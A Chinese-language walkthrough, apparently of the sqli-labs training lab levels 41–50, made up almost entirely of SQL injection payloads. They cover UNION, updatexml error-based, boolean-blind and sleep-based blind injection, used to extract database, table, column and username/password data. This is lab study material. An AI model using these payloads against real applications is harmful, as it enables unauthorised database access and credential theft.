四十一

1.查看数据库名

?id=-1 union select 1,2,database()--+

2.查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

3.查看user表列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

4.查看user表中信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

四十二

1.抓包发送到重放器

2.查看数据库名

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select database())),1)--+

3.查看表名

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

4.查看user表中列名

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

5.查看user表中信息

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

四十三

1.登录抓包放到重放器

2.查看数据库名

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select database())),1)--+

3.查看表名

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

4.查看user表中列名

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

5.查看user表中信息

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

四十四

1.登录抓包放到重放器

2.

页面只有ture和flase两种情况，所以需要使用布尔盲注

判断数据库长度大于7 页面图片消失

login_user=1'or 1=1--+&login_password=1000'or length(database())>7--+

3.

判断数据库长度大于8 页面报错 说明数据库长度等于8：

login_user=1'or 1=1--+&login_password=1000'or length(database())>8--+

4.判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面图片消失
login_user=1'or 1=1--+&login_password=1000'or ascii(substr(database(),1,1))>114--+

5.判断数据库第一位字符的ascii码是否大于115 页面显示报错  说明第一位字符ascii码等于115

login_user=1'or 1=1--+&login_password=1000'or ascii(substr(database(),1,1))>115--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

6.查security数据库中第一张表的第一位字符

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

7.

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

8.判断users表中第一个字段的第一位字符

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

9.

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

10.判断username列的第一条数据的第一个字符

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select username from users limit 0,1),1,1))>67--+

11.

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select username from users limit 0,1),1,1))>68--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

四十五.

1.抓包放入重放器里

2.页面只有ture和flase两种情况，所以需要使用布尔盲注

判断数据库长度大于7 页面图片消失

login_user=1')or 1=1--+&login_password=1000')or length(database())>7--+

3.判断数据库长度大于8 页面报错 说明数据库长度等于8：

login_user=1')or 1=1--+&login_password=1000')or length(database())>8--+

4.判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面图片消失
login_user=1')or 1=1--+&login_password=1000')or ascii(substr(database(),1,1))>114--+

5.判断数据库第一位字符的ascii码是否大于115 页面显示报错  说明第一位字符ascii码等于115

login_user=1')or 1=1--+&login_password=1000')or ascii(substr(database(),1,1))>115--+

6.查security数据库中第一张表的第一位字符

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--

7.

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

8.判断users表中第一个字段的第一位字符

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

9.

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

10.判断username列的第一条数据的第一个字符

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select username from users limit 0,1),1,1))>67--+

11.

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select username from users limit 0,1),1,1))>68--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

四十六.

1.这关的参数是sort，输入?sort=1

2查看数据库

?sort=1 and updatexml(1,concat(1,(select database())),1)

3.查看表名

?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

四十七

1.这关的参数是sort，输入?sort=1'--+闭合

2.查看数据库

?sort=1' and updatexml(1,concat(1,(select database())),1)--+

3.查看表名

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

四十八

1.这关的参数是sort，输入?sort=1

2.查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)

3,

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

4.查看表名

查security数据库中第一张表的第一位字符

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)

5.页面延迟三秒访问

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

四十九

1.这关的参数是sort，输入?sort=1'--+闭合

2.查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

3.判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

4.查看表名
查security数据库中第一张表的第一位字符

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

5.页面延迟三秒访问

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

五十

1这关的参数是sort，输入?sort=1

2.查看数据库

?sort=1 and updatexml(1,concat(1,(select database())),1)

3.查看表名

?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)